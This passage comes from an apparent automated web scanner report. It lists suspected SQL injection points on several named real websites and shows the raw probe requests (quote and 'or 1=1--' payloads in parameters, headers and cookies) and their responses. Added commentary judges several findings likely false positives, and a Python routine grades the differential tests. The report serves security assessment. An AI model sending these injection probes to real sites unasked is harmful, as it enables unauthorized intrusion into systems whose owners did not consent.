User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)''
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 22:39:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.12
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=q9ifci6l2j2tdrl3iv7clgbn71; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Connection: close
Content-Type: text/html
Content-Length: 15274

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Linka
...[SNIP]...

1.33. http://www.linkatopia.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.linkatopia.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. Taken with the Referer and User-Agent findings above (1.31, 1.32), the three linkatopia.com results show the same behaviour for each request attribute a page-view logger would record ("Update referer failed", "Update user agent failed", "Update page count failed"), which points at one shared logging write path rather than three separate flaws.

Request 1

GET /?1'=1 HTTP/1.1
Host: www.linkatopia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 22:39:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.12
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=68dgcspto6ppv3i6dcpvk1gcl5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Content-Length: 24
Connection: close
Content-Type: text/html

Update page count failed

Request 2

GET /?1''=1 HTTP/1.1
Host: www.linkatopia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 22:39:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.12
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=ornsar14q490r54ghf8kqfk9n6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Connection: close
Content-Type: text/html
Content-Length: 15274

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Linka
...[SNIP]...

1.34. http://www.linkfixerplus.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.linkfixerplus.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 16036492%20or%201%3d1--%20 and 16036492%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

In this instance the differing response is Apache's own 403 Forbidden error document (with a 404 encountered while resolving the ErrorDocument) for the or 1=1-- payload, while the or 1=2-- payload returned the normal 200 home page. A web-server-level rejection of one payload is not evidence that a query result changed, and is consistent with a request filter blocking the classic 1=1 pattern; treat this as a likely false positive until a manual test reproduces a content difference in application output.

Request 1

GET /?116036492%20or%201%3d1--%20=1 HTTP/1.1
Host: www.linkfixerplus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 403 Forbidden
Date: Sun, 06 Feb 2011 17:23:02 GMT
Server: Apache/2.2.10 (Unix) mod_ssl/2.2.10 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 506
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.10 (Unix) mod_ssl/2.2.10 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.linkfixerplus.com Port 80</address>
</body></html>

Request 2

GET /?116036492%20or%201%3d2--%20=1 HTTP/1.1
Host: www.linkfixerplus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 17:23:02 GMT
Server: Apache/2.2.10 (Unix) mod_ssl/2.2.10 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 33322

<HTML><HEAD>
<link rel="alternate" type="application/rss+xml" title="RSS Feed for LinkTek.com" href="rss/rss.xml"
/>

<!-- AddThis.com Buttons Javascript -->
<script type="text/javascript">var addthis_pub="linktek";</script>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>

<TITLE>Fix broken links with LinkFixerPlus.</TITLE>
<meta name="verify-v1" content="BNstwDGv3/hYpx4cvJhG0OPgV5EN3GT+S3YtHTwQ6NQ=" />
<META NAME = "Description" CONTENT="LinkFixerPlus automatically reports, finds and fixes broken links when you move or rename files. Fix broken links in Microsoft, Word, Excel, Access, PowerPoint, AutoCAD, InDesign and HTML files.">
<META NAME = "Content-Type" CONTENT="text/html; charset=iso-8859-1">
<META NAME = "Keywords" CONTENT="broken link, broken links, fix broken links, LinkFixerPlus, link fixer, microsoft, fix broken link, data migration, linktek, excel, microsoft office, word, powerpoint, access, autocad, indesign, html, document management, storage server, folder reorganization">
<META NAME="Author" CONTENT="LinkTek's LinkFixerPlus">
<META NAME="Robots" CONTENT="ALL">

<link rel="stylesheet" href="lfp-styles.css" type="text/css">

<SCRIPT type="text/javascript" src="menufunctions.js"></SCRIPT>
<SCRIPT type="text/javascript" src="mm_layerfunctions.js"></SCRIPT>
<SCRIPT type="text/javascript" src="menuitemshome.js"></SCRIPT>
<SCRIPT type="text/javascript" src="global.js"></SCRIPT>

</HEAD>

<BODY BGCOLOR=#FFFFFF LEFTMARGIN=0 TOPMARGIN=0 MARGINWIDTH=0 MARGINHEIGHT=0 link="#3366CC" OnUnload="submitForm();">
<form name="FORM_NAME" method="post">
<input type="hidden" name="cookies" value="" />
<input type="hidden" name="referer_string" value=""
...[SNIP]...
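
Finding 1.34 rests on a response difference, and the difference shown is Apache's own 403 page rather than application output. The following Python is an added example, not code from the scanner or from linkfixerplus.com: it grades a true/false payload pair the way a differential test should, and first checks whether either response is the web server's error document, in which case the comparison says nothing about the SQL. The Response type, the similarity threshold and the two constructed page bodies are assumptions for the demonstration; the second scenario is hypothetical and shows the pattern a genuine boolean injection produces.

```python
"""Grade a boolean-based SQL injection differential (`or 1=1--` versus `or 1=2--`)
and separate a web-server rejection from a genuine change in application output.

Added example; it is not code from the scanner or from the site in finding 1.34.
Response bodies are constructed from the excerpts in that finding, abbreviated;
the second scenario is hypothetical and shows what a real positive looks like."""
import re
from dataclasses import dataclass
from difflib import SequenceMatcher


@dataclass
class Response:
    status: int
    body: str


# Apache's default error document: "<title>NNN Reason</title>" and a
# "<address>... Server at <host> Port <n></address>" footer. When this page
# comes back, the web server answered for itself and the application's SQL
# never ran for that request.
APACHE_ERROR_PAGE = re.compile(
    r"<title>\s*\d{3}\s+[^<]*</title>.*?<address>.*?Server at \S+ Port \d+</address>",
    re.S | re.I,
)


def is_server_error_page(resp):
    return resp.status >= 400 and APACHE_ERROR_PAGE.search(resp.body) is not None


def similarity(a, b):
    """0.0..1.0 text similarity; 1.0 means identical."""
    return SequenceMatcher(None, a, b).ratio()


def classify_boolean_diff(baseline, true_resp, false_resp, same=0.98):
    """baseline: unmodified request; true_resp: `or 1=1--` payload;
    false_resp: `or 1=2--` payload. Returns (verdict, reason)."""
    if is_server_error_page(true_resp) or is_server_error_page(false_resp):
        return ("inconclusive",
                "a payload was rejected by the web server (request filter/WAF), not by application code")
    if similarity(true_resp.body, false_resp.body) >= same:
        return "not-vulnerable", "true and false conditions produce the same output"
    if (similarity(true_resp.body, baseline.body) >= same
            and similarity(false_resp.body, baseline.body) < same):
        return "candidate", "true condition reproduces the baseline, false condition changes the output"
    return "inconclusive", "outputs differ, but not in the pattern a boolean condition would produce"


# --- constructed samples (abbreviated from the report's excerpts) -----------
APACHE_403 = """<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.10 (Unix) Server at www.linkfixerplus.com Port 80</address>
</body></html>"""
LFP_HOME = "<HTML><HEAD><TITLE>Fix broken links with LinkFixerPlus.</TITLE></HEAD><BODY>home</BODY></HTML>"


def finding_1_34():
    """1=1 -> Apache 403 page, 1=2 -> normal home page: the server blocked the payload."""
    home = Response(200, LFP_HOME)
    return classify_boolean_diff(home, Response(403, APACHE_403), home)


# Hypothetical search page whose WHERE clause the payload actually reaches.
LISTING = "<ul><li>Item 1</li><li>Item 2</li><li>Item 3</li></ul>"
EMPTY = "<ul></ul>"


def hypothetical_true_positive():
    """1=1 keeps every row (same as baseline), 1=2 empties the result set."""
    base = Response(200, LISTING)
    return classify_boolean_diff(base, Response(200, LISTING), Response(200, EMPTY))


if __name__ == "__main__":
    print("1.34:", finding_1_34())
    print("hypothetical:", hypothetical_true_positive())
```

The order of the checks is the point: a differential test only means something when both responses came from the application, so the server-error-page check runs before any similarity comparison, and a positive requires the true condition to look like the baseline while the false condition does not.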

1.35. http://www.linuxsecurity.com/ads/adjs.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.linuxsecurity.com
Path:   /ads/adjs.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL. Note, however, that the response shown is a normal 200 OK page (Content-Length 61909) whose excerpt contains the advisory headline "Ubuntu: 1058-1: PostgreSQL vulnerability". On a site that publishes PostgreSQL advisories, a PostgreSQL fingerprint is very likely a keyword match on page content rather than a database error, and no '' control request was sent. Compare the body against a baseline response without the quote before treating this as a real finding.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /ads'/adjs.php?n=424430122&what=zone:4&exclude=,&referer=http%3A//burp/show/23 HTTP/1.1
Host: www.linuxsecurity.com
Proxy-Connection: keep-alive
Referer: http://www.linuxsecurity.com/advisories/?1'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 473097ac08cef5345a0ef7ef35a119cd=-

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 22:39:44 GMT
Server: Apache
X-Powered-By: PHP/4.4.7
Set-Cookie: 473097ac08cef5345a0ef7ef35a119cd=877aa9e56ef049011927f0bede7adce6; path=/
Set-Cookie: mosvisitor=1
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat, 05 Feb 2011 22:39:45 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 61909

<?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999
...[SNIP]...
<a href="http://www.linuxsecurity.com/content/view/154306/">Ubuntu: 1058-1: PostgreSQL vulnerability</a>
...[SNIP]...

1.36. http://www.linuxsecurity.com/ads/adjs.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.linuxsecurity.com
Path:   /ads/adjs.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL. Note, however, that the response shown is a normal 200 OK page (Content-Length 61909) whose excerpt contains the advisory headline "Ubuntu: 1058-1: PostgreSQL vulnerability". On a site that publishes PostgreSQL advisories, a PostgreSQL fingerprint is very likely a keyword match on page content rather than a database error, and no '' control request was sent. Compare the body against a baseline response without the quote before treating this as a real finding.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /ads/adjs.php'?n=424430122&what=zone:4&exclude=,&referer=http%3A//burp/show/23 HTTP/1.1
Host: www.linuxsecurity.com
Proxy-Connection: keep-alive
Referer: http://www.linuxsecurity.com/advisories/?1'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 473097ac08cef5345a0ef7ef35a119cd=-

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 22:39:52 GMT
Server: Apache
X-Powered-By: PHP/4.4.7
Set-Cookie: 473097ac08cef5345a0ef7ef35a119cd=2ec72741552f32c77a2eb063a30c97bd; path=/
Set-Cookie: mosvisitor=1
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat, 05 Feb 2011 22:39:53 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 61909

<?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999
...[SNIP]...
<a href="http://www.linuxsecurity.com/content/view/154306/">Ubuntu: 1058-1: PostgreSQL vulnerability</a>
...[SNIP]...

1.37. http://www.linuxsecurity.com/ads/adlog.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.linuxsecurity.com
Path:   /ads/adlog.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL. Note, however, that the response shown is a normal 200 OK page (Content-Length 61909) whose excerpt contains the advisory headline "Ubuntu: 1058-1: PostgreSQL vulnerability". On a site that publishes PostgreSQL advisories, a PostgreSQL fingerprint is very likely a keyword match on page content rather than a database error, and no '' control request was sent. Compare the body against a baseline response without the quote before treating this as a real finding.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /ads'/adlog.php?bannerid=75&clientid=52&zoneid=4&source=&block=0&capping=0&cb=d44f13e3bc6b9e50f3529e3826e3166b HTTP/1.1
Host: www.linuxsecurity.com
Proxy-Connection: keep-alive
Referer: http://www.linuxsecurity.com/advisories/?1'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 473097ac08cef5345a0ef7ef35a119cd=-

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 22:41:09 GMT
Server: Apache
X-Powered-By: PHP/4.4.7
Set-Cookie: 473097ac08cef5345a0ef7ef35a119cd=cf9cf38d4638ae0b950d8f0b1cec8309; path=/
Set-Cookie: mosvisitor=1
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat, 05 Feb 2011 22:41:10 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 61909

<?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999
...[SNIP]...
<a href="http://www.linuxsecurity.com/content/view/154306/">Ubuntu: 1058-1: PostgreSQL vulnerability</a>
...[SNIP]...

1.38. http://www.linuxsecurity.com/ads/adlog.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.linuxsecurity.com
Path:   /ads/adlog.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL. Note, however, that the response shown is a normal 200 OK page (Content-Length 61909) whose excerpt contains the advisory headline "Ubuntu: 1058-1: PostgreSQL vulnerability". On a site that publishes PostgreSQL advisories, a PostgreSQL fingerprint is very likely a keyword match on page content rather than a database error, and no '' control request was sent. Compare the body against a baseline response without the quote before treating this as a real finding.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /ads/adlog.php'?bannerid=75&clientid=52&zoneid=4&source=&block=0&capping=0&cb=d44f13e3bc6b9e50f3529e3826e3166b HTTP/1.1
Host: www.linuxsecurity.com
Proxy-Connection: keep-alive
Referer: http://www.linuxsecurity.com/advisories/?1'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 473097ac08cef5345a0ef7ef35a119cd=-

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 22:41:18 GMT
Server: Apache
X-Powered-By: PHP/4.4.7
Set-Cookie: 473097ac08cef5345a0ef7ef35a119cd=90f2247981d79aaa6ef9cb5f3e34b1a8; path=/
Set-Cookie: mosvisitor=1
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat, 05 Feb 2011 22:41:19 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 61909

<?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999
...[SNIP]...
<a href="http://www.linuxsecurity.com/content/view/154306/">Ubuntu: 1058-1: PostgreSQL vulnerability</a>
...[SNIP]...

1.39. http://www.linuxsecurity.com/advisories/ [473097ac08cef5345a0ef7ef35a119cd cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.linuxsecurity.com
Path:   /advisories/

Issue detail

The 473097ac08cef5345a0ef7ef35a119cd cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the 473097ac08cef5345a0ef7ef35a119cd cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL. Note, however, that the redirected response shown is a normal 200 OK page (Content-Length 49614) whose excerpt contains the advisory headline "Ubuntu: 1058-1: PostgreSQL vulnerability", and the server simply issued a fresh session cookie. On a site that publishes PostgreSQL advisories, a PostgreSQL fingerprint is very likely a keyword match on page content rather than a database error, and no '' control request was sent. Compare the body against a baseline response without the quote before treating this as a real finding.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /advisories/ HTTP/1.1
Host: www.linuxsecurity.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 473097ac08cef5345a0ef7ef35a119cd=-'; __utmz=137231789.1296945319.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/23; __utma=137231789.34780583.1296945313.1296945313.1296945313.1; __utmc=137231789; __utmb=137231789.1.10.1296945313;

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:02:57 GMT
Server: Apache
X-Powered-By: PHP/4.4.7
Set-Cookie: 473097ac08cef5345a0ef7ef35a119cd=a8f4bb5b5ebd8c70262e80f90ab7a88e; path=/
Set-Cookie: mosvisitor=1
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat, 05 Feb 2011 23:02:58 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 49614

<?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999
...[SNIP]...
<a href="http://www.linuxsecurity.com/content/view/154306/">Ubuntu: 1058-1: PostgreSQL vulnerability</a>
...[SNIP]...

1.40. http://www.linuxsecurity.com/advisories/ [Referer HTTP header]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.linuxsecurity.com
Path:   /advisories/

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the Referer HTTP header, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL. Note, however, that the redirected response shown is a normal 200 OK page (Content-Length 49614) whose excerpt contains the advisory headline "Ubuntu: 1058-1: PostgreSQL vulnerability". On a site that publishes PostgreSQL advisories, a PostgreSQL fingerprint is very likely a keyword match on page content rather than a database error, and no '' control request was sent. Compare the body against a baseline response without the quote before treating this as a real finding.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /advisories/ HTTP/1.1
Host: www.linuxsecurity.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q='

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 22:06:59 GMT
Server: Apache
X-Powered-By: PHP/4.4.7
Set-Cookie: 473097ac08cef5345a0ef7ef35a119cd=-; path=/
Set-Cookie: mosvisitor=1
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat, 05 Feb 2011 22:07:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 49614

<?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999
...[SNIP]...
<a href="http://www.linuxsecurity.com/content/view/154306/">Ubuntu: 1058-1: PostgreSQL vulnerability</a>
...[SNIP]...

1.41. http://www.linuxsecurity.com/advisories/ [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.linuxsecurity.com
Path:   /advisories/

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the User-Agent HTTP header, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL. Note, however, that the redirected response shown is a normal 200 OK page (Content-Length 49614) whose excerpt contains the advisory headline "Ubuntu: 1058-1: PostgreSQL vulnerability". On a site that publishes PostgreSQL advisories, a PostgreSQL fingerprint is very likely a keyword match on page content rather than a database error, and no '' control request was sent. Compare the body against a baseline response without the quote before treating this as a real finding.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /advisories/ HTTP/1.1
Host: www.linuxsecurity.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 22:06:56 GMT
Server: Apache
X-Powered-By: PHP/4.4.7
Set-Cookie: 473097ac08cef5345a0ef7ef35a119cd=-; path=/
Set-Cookie: mosvisitor=1
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat, 05 Feb 2011 22:06:57 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 49614

<?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999
...[SNIP]...
<a href="http://www.linuxsecurity.com/content/view/154306/">Ubuntu: 1058-1: PostgreSQL vulnerability</a>
...[SNIP]...

1.42. http://www.linuxsecurity.com/advisories/ [__utma cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.linuxsecurity.com
Path:   /advisories/

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the __utma cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /advisories/ HTTP/1.1
Host: www.linuxsecurity.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 473097ac08cef5345a0ef7ef35a119cd=-; __utmz=137231789.1296945319.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/23; __utma=137231789.34780583.1296945313.1296945313.1296945313.1'; __utmc=137231789; __utmb=137231789.1.10.1296945313;

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:03:05 GMT
Server: Apache
X-Powered-By: PHP/4.4.7
Set-Cookie: 473097ac08cef5345a0ef7ef35a119cd=98ef37fcd77bae99f8502f54e9981f07; path=/
Set-Cookie: mosvisitor=1
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat, 05 Feb 2011 23:03:07 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 49614

<?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999
...[SNIP]...
<a href="http://www.linuxsecurity.com/content/view/154306/">Ubuntu: 1058-1: PostgreSQL vulnerability</a>
...[SNIP]...

1.43. http://www.linuxsecurity.com/advisories/ [__utmb cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.linuxsecurity.com
Path:   /advisories/

Issue detail

The __utmb cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the __utmb cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /advisories/ HTTP/1.1
Host: www.linuxsecurity.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 473097ac08cef5345a0ef7ef35a119cd=-; __utmz=137231789.1296945319.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/23; __utma=137231789.34780583.1296945313.1296945313.1296945313.1; __utmc=137231789; __utmb=137231789.1.10.1296945313';

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:03:18 GMT
Server: Apache
X-Powered-By: PHP/4.4.7
Set-Cookie: 473097ac08cef5345a0ef7ef35a119cd=6c7734da832a57908a771a3d56456c00; path=/
Set-Cookie: mosvisitor=1
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat, 05 Feb 2011 23:03:19 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
